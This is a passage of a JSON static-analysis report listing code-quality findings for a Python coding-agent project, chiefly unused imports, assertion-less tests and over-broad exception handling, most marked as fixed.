"fp|077e330b79c50ab2d86b3ed34f64db1c3129e5a92ff58c30361c05d29a265cdb"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 188}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22339, "scanner": "repobility", "fingerprint": "3f3737c9e4cb9bab70cbfd67fa6d46e8", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: os (as os)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_skills_loader_ws8.py"}, "region": {"startLine": 3}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22338, "scanner": "repobility", "fingerprint": "13d45ac817a8e226cbae4b0e9dddbef7", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_skills_loader_ws8.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22337, "scanner": "repobility", "fingerprint": "4fe7b501e627e4dc909a79c708600215", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: src.types.content_blocks.TextBlock (as TextBlock)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_session_resume.py"}, "region": {"startLine": 17}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22336, "scanner": "repobility", "fingerprint": "57552cb85a41a4ef8818bc632f6609b4", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: pytest (as pytest)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_session_resume.py"}, "region": {"startLine": 8}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22335, "scanner": "repobility", "fingerprint": "c8894b388fff119e2f743be87ec0eb2b", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: pathlib.Path (as Path)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_session_resume.py"}, "region": {"startLine": 6}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22334, "scanner": "repobility", "fingerprint": "6ffd4c4cfd68a445651b37e8a1d02ef0", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/test_session_resume.py"}, "region": {"startLine": 3}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22333, "scanner": "repobility", "fingerprint": "e9c19511a0b942d9609313ed2542fe13", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: pathlib.Path (as Path)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/utils/git.py"}, "region": {"startLine": 8}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22332, "scanner": "repobility", "fingerprint": "75667c117503c1c79037a24e811fb519", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: dataclasses.field (as field)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/utils/git.py"}, "region": {"startLine": 7}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22331, "scanner": "repobility", "fingerprint": "b60d884def5489c0aa6cac1776386be6", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/utils/git.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22330, "scanner": "repobility", "fingerprint": "227e178524f8f269a9852a23be39b6fb", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: rich.prompt.Prompt (as Prompt)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 19}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22329, "scanner": "repobility", "fingerprint": "66262c63cf9354d59c3b105b6df5b3a2", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: rich.text.Text (as Text)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 18}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22328, "scanner": "repobility", "fingerprint": "caa0ca60c51a9f2028eedce8df58445e", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: tool_pool.assemble_tool_pool (as assemble_tool_pool)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 38}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22327, "scanner": "repobility", "fingerprint": "1983e9316309365a8b73a77eec55316f", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: command_graph.build_command_graph (as build_command_graph)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22326, "scanner": "repobility", "fingerprint": "9dd6ac64c6d0d38d42ce6ec843bfe477", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: bootstrap_graph.build_bootstrap_graph (as build_bootstrap_graph)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 36}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22325, "scanner": "repobility", "fingerprint": "01456ad47d681c32d71fe1c64abbf700", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: setup.run_setup (as run_setup)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 33}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22324, "scanner": "repobility", "fingerprint": "e8d71b899af1fedf07c313ec406b5994", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: typing.Optional (as Optional)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 11}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22323, "scanner": "repobility", "fingerprint": "59974b5ec47b72af686bf60ad1243528", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: sys (as sys)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 10}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22322, "scanner": "repobility", "fingerprint": "dd6826e4d9f93e015cd4c1f524edcdbe", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: os (as os)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 9}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22321, "scanner": "repobility", "fingerprint": "89e34c534e6dccb3149d05ba93905c88", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/repl.py"}, "region": {"startLine": 7}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22319, "scanner": "repobility", "fingerprint": "59416025903581759737c1d494b8814a", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: pytest (as pytest)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/tui/test_history_store.py"}, "region": {"startLine": 5}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22318, "scanner": "repobility", "fingerprint": "d492f0ed7722abc9b4dea7e765689b40", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/tests/tui/test_history_store.py"}, "region": {"startLine": 3}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22314, "scanner": "repobility", "fingerprint": "917956fd03a85b0bf136a72956976424", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/cost_tracker.py"}, "region": {"startLine": 1}}}]}, {"ruleId": "QUAL007", "level": "error", "message": {"text": "Imported but never used"}, "properties": {"repobilityId": 22310, "scanner": "repobility", "fingerprint": "2519df9ffdb240d23e335113dd76a145", "category": "quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "unused import: __future__.annotations (as annotations)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "dead-imports"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/keybindings/__init__.py"}, "region": {"startLine": 3}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19013, "scanner": "repobility", "fingerprint": "13d333e98e3dee9eaea113078a96641e", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_not_yet_implemented_acknowledged", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/parity/test_tool_parity.py"}, "region": {"startLine": 49}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19012, "scanner": "repobility", "fingerprint": "5e79f5f185e544784d314e40b98c944b", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_local_slash_repl_is_alias_for_exit", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/tui/test_app_pilot.py"}, "region": {"startLine": 133}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19011, "scanner": "repobility", "fingerprint": "4b472dad2554978da0561d9b7e6448d6", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_local_slash_exit_quits_app", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/tui/test_app_pilot.py"}, "region": {"startLine": 118}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19010, "scanner": "repobility", "fingerprint": "f8247e9dd6038e7bebedfb4b533d236d", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_src_repl_py_is_valid_python", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_legacy_repl_module.py"}, "region": {"startLine": 9}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19009, "scanner": "repobility", "fingerprint": "5334f8deb4b4bf03739d553444c6c66f", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_null_sink", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_analytics.py"}, "region": {"startLine": 40}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19008, "scanner": "repobility", "fingerprint": "660bf64107150bbd9fac1b85922c6501", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_returns_none_when_no_managed_file", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_settings.py"}, "region": {"startLine": 160}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19007, "scanner": "repobility", "fingerprint": "3156ae01f793df8a5e12a5fd6f6c1ce0", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_build_imports", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_smoke.py"}, "region": {"startLine": 157}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19006, "scanner": "repobility", "fingerprint": "a57769607600c2c8b597c07c61fa4d66", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_no_crash", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_prompt_assembly.py"}, "region": {"startLine": 210}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19005, "scanner": "repobility", "fingerprint": "9aa0c42c216d6395b5de5f56daa5e0cc", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_throw_if_aborted_noop_when_not_aborted", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_abort_controller.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19004, "scanner": "repobility", "fingerprint": "379175180b147d6efa4be656431fc5e7", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_handle_response_unknown_id", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ide_connection.py"}, "region": {"startLine": 105}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19003, "scanner": "repobility", "fingerprint": "a6275ca1dc7f9f49dfb27bccb00349dc", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_public_api_exports", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ws5_integration.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19002, "scanner": "repobility", "fingerprint": "ad07dd91b74beaa42e2baa0f1b3034be", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_tool_search_imports", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ws5_integration.py"}, "region": {"startLine": 92}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19001, "scanner": "repobility", "fingerprint": "e1cad055bc758be2ee9f63d7ab7a444b", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_context_system_imports", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ws5_integration.py"}, "region": {"startLine": 84}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 19000, "scanner": "repobility", "fingerprint": "3baa6623712a354ca5a40c9b15956682", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_interrupt", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_query_engine.py"}, "region": {"startLine": 93}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 18999, "scanner": "repobility", "fingerprint": "7b2019ad41f6e919f6e5e16d621e9b5b", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_safety_gate_allows_root_when_bubblewrap_set", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_dangerous_skip_permissions.py"}, "region": {"startLine": 108}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 18998, "scanner": "repobility", "fingerprint": "749f1e64ea3ee9e3fdca7b0ae5a0a80b", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_safety_gate_allows_root_when_is_sandbox_set", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_dangerous_skip_permissions.py"}, "region": {"startLine": 101}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 18997, "scanner": "repobility", "fingerprint": "3eb4055282270558e53aa5506a93d477", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_safety_gate_no_op_when_not_root", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_dangerous_skip_permissions.py"}, "region": {"startLine": 83}}}]}, {"ruleId": "TEST001", "level": "error", "message": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "properties": {"repobilityId": 18996, "scanner": "repobility", "fingerprint": "2785c5c335113b4c29fc1c8e5cf387d1", "category": "test_quality", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "test_* without asserts: test_safety_gate_no_op_when_bypass_not_requested", "aljefra_cwe": ["CWE-1126"], "aljefra_owasp": null, "aljefra_pattern_slug": "phantom-test-coverage"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_dangerous_skip_permissions.py"}, "region": {"startLine": 78}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18471, "scanner": "repobility", "fingerprint": "8c314b7852a7a5735e34364dd398089d", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 150}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18470, "scanner": "repobility", "fingerprint": "45d8bda68358a066233de332141c8b12", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/headless.py"}, "region": {"startLine": 239}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18469, "scanner": "repobility", "fingerprint": "4bc4d0913ef3e595b594bea8b6ebfb14", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 1670}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18468, "scanner": "repobility", "fingerprint": "7fbd7f0b6c59366073fef151cba59b7e", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 1569}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18467, "scanner": "repobility", "fingerprint": "e153384199d964a90cf126f0b9be8fee", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt,EOFError", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl.py"}, "region": {"startLine": 249}}}]}, {"ruleId": "ERRH003", "level": "error", "message": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "properties": {"repobilityId": 18466, "scanner": "repobility", "fingerprint": "5d783c3cff58d0d10fb7f19970f62193", "category": "error_handling", "severity": "high", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "except KeyboardInterrupt", "aljefra_cwe": ["CWE-705"], "aljefra_owasp": null, "aljefra_pattern_slug": "overcatch-baseexception"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/diagnose_keys.py"}, "region": {"startLine": 96}}}]}, {"ruleId": "ERRH001", "level": "error", "message": {"text": "Bare except: pass \u2014 silent failure"}, "properties": {"repobilityId": 17595, "scanner": "repobility", "fingerprint": "6fedc2d359ce3225061c1123654f5677", "category": "error_handling", 